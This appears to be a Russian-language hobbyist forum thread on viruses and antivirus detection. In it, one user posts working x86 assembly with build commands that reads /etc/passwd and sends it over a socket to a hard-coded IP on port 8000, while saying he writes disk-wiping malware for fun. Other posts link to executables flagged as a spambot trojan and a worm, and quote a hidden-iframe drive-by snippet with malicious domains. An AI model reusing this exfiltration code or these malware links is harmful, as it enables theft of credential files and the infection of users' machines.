вирусы

[Alex Keda]

Да мне Энди давал.
Запускали - не работает

[Хостинг HostFood.ru]

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

[zingel]

надо кстати у него спросить есть там полиморфники и криптованые ELF у него
или токо в скриптах

не полиморфов не держу, а криптованные как и всё....самый понтовый вирь, который собирается как модуль ядра и потом тихонько срёт в сеть бродкастами, при попытке выгрузки трёт весь диск, но я его давно потерял, вот пытаюсь написать сам, ради прикола...

[zg]

http://clubs.ya.ru/4611686018427388619/ ... tem_no=198

Пятерка злостных «антивирусов» - программы-«обманщики»

нда... куда мир катится...

[Alex Keda]

ф топку

[paradox]

>zingel
самые прикольные
если у тебя они есть
это те которые врезаються в elf файлы прог
вот жесть))
а всяческие скрипты итд
это игрушки)

[zingel]

ну, те что по эльфу размазываются - хорошо, однако у меня таких нет =(

[zingel]

вот есть шелкодик, по-эльфу размазывается, от зеродей(zero day) размазывается и биндиться на 8000 порт, исключительно под фряху

Код: Выделить всё

_start:
xor eax, eax
push byte 0x64
push word 0x7773
push 0x7361702f
push 0x6374652f  
mov ebx, esp
push eax
push ebx
mov al, 5       
push eax
int 0x80        
mov ebx, eax      
xor eax, eax     
xor ecx, ecx

mov cx, 3333     
push ecx
mov esi, esp     
push esi
push ebx
mov al, 3
push eax
int 0x80         

mov ebp, eax
xor eax, eax
mov al, 6
push ebx
push eax
int 0x80        

xor eax, eax
push eax
push byte 0x01
push byte 0x02
mov al, 97
push eax
int 0x80         

mov edx, eax     

push 0x2101a8c0   
push 0x401f02AA  
mov eax, esp

push byte 0x10
push eax
push edx
xor eax, eax
mov al, 98
push eax
int 0x80        

xor eax, eax
push ebp
push esi        
push edx
mov al, 4
push eax
int 0x80        

xor eax, eax
inc eax
push eax
push eax
int 0x80        

компилить

Код: Выделить всё

nasm -f elf shellcode.asm
ld -e _start -o shellcode shellcode.o

[gloom]

Код: Выделить всё

Проверка: http://paradox.org.ua/work/dpbe.exe
Версия антивирусного ядра: 4.44.0.9170
Размер файла: 32.50 КБ

http://paradox.org.ua/work/dpbe.exe packed by UPX
>http://paradox.org.ua/work/dpbe.exe infected with Trojan.Spambot.3561

Код: Выделить всё

Проверка: http://paradox.org.ua/work/wuauclt.exe
Версия антивирусного ядра: 4.44.0.9170
Размер файла: 26.50 КБ

http://paradox.org.ua/work/wuauclt.exe infected with Win32.HLLW.Autoruner.2661

[paradox]

drweb ?

[gloom]

угу

[freeman]

Проверьте его на h__p://www.virustotal.com Очень интересно кто поймает/не поймает.
По поводу НОДа и т.д. По опыту 2х сетей (встречаюейся там заразы) Касперский больше всех ловит и при этом на чистые файлы (просто упакованные "опасным"пакером, уже вылеченые др. антивирем, но с частично оставшимися неопасным кодом, просто нормальные файлы) не фальшдетектит. А идеального (чтобы ловил 100%) не бывает. Это только в Вирус биллютене НОД как то таким "рисуется"

[zg]

Проверьте его на h__p://www.virustotal.com Очень интересно кто поймает/не поймает.

кого там ловить....?!!!!

Код: Выделить всё

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd">
<!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd"> -->
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="0.1">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<TITLE></TITLE>
</HEAD>
<BODY><P></BODY>
</HTML>

подождал пока рефреш сработает

Код: Выделить всё

	<script type="text/javascript" src="/virustotalV2.js"></script>
	<script type="text/javascript" src="/autoidioma.js"></script>

правда скачать не дали... видимо рефер проверяют, но название скрипта уже обнадёживает )))

[paradox]

сижу и рыдаююю))))
обновил верисю баз нода 2.7
и всеравно вирус не видет
писеццццц

[freeman]

Блин да давно уже всем известно (имхо) что нод это дырка в антивирускной защите
Проверь свой вирус на h__p://www.virustotal.com и делай выводы.

[paradox]

так у zg определяет
токоу него версия стреее моей))))рыдаю

[paradox]

таксь
zg а базы от твоей версии нока к моей подойдут?
они удаленно обновляються?
поделись аккаунтом))

[zg]

таксь
zg а базы от твоей версии нока к моей подойдут?
они удаленно обновляються?
поделись аккаунтом))

у меня зеркало в локалке могу только архив выложить. Вроде прога есть, которая апдейт подготавливает для нода. Могу поискать и выложить, если надо

[paradox]

нод виевер
у мну есть такая
токо смысл?))
у меня всеравно с теми базами не определяет
говорю же - последние обновил
вотдумаю может по разным пароль логинам с сайта раздают разные базы
надо будет поискать другие аккаунты

[zg]

вотдумаю может по разным пароль логинам с сайта раздают разные базы

на счёт логинов не знаю, а то что серваки бывают разные и обновления на них разные, это да. При чём самое смешное было то, что чтобы обновиться надо было раз десять тыкнуть на кнопку обновиться. Раза с седьмого он успешно обновлялся с того же сервака, с которого десять минут назад слил последние обновления. В чём был прикол, не знаю, но это было на самом деле. Я приходил на работу тупо тыкал обновляться пока он не сливал нормально базу. Но ни один вирь ко на комп не попадал, а на сосдених компах он спокойно пропускал почти все вири... И наколько я помню сливал базы с офф. сайта просто потому, что моя версия нода не держала какую-то авторизацию... Правда потом всё равно прикрыли...

[paradox]

пакуй и заливай свою базу от нода на фтп
надо разобраться
где это глюк
в базах
или версиях нода)

[zg]

ftp://ftp.lissyara.su/upload/NOD-DB-3500/NOD-3500.rar держи -)

[schizoid]

продолжу тему вирусы.
ща у клиента квип рассылает по списку контактов сцылку , по которой если зайти, то ловишь вирь. НОД32 и каспер не видят ниче. чем мона полечить?

[zg]

кстати выложи ссылку, поиграимся

зайди на сайт квипа, думаю трабла такая не только у тебя

[schizoid]

сцылко воть
http://absoluts.org/img/live.gif
под фрей заходил, там картинко, вроде ниче криминального...но венда вешается говорят

[zg]

картинко говоришь? там такая хрень сидит

Код: Выделить всё

<img src="2410232.jpg">
<iframe src="http://linenetz.com/stats/ru1.php" style="display:none"></iframe>

а картинка вполне безобидная

Короче говоря там куча редиректов в итоге пришёл на

Код: Выделить всё

http://mydom3.ru/

вирусов не нашёл, но вполне вероятно, что браузер нацепляет кучу всякой заразы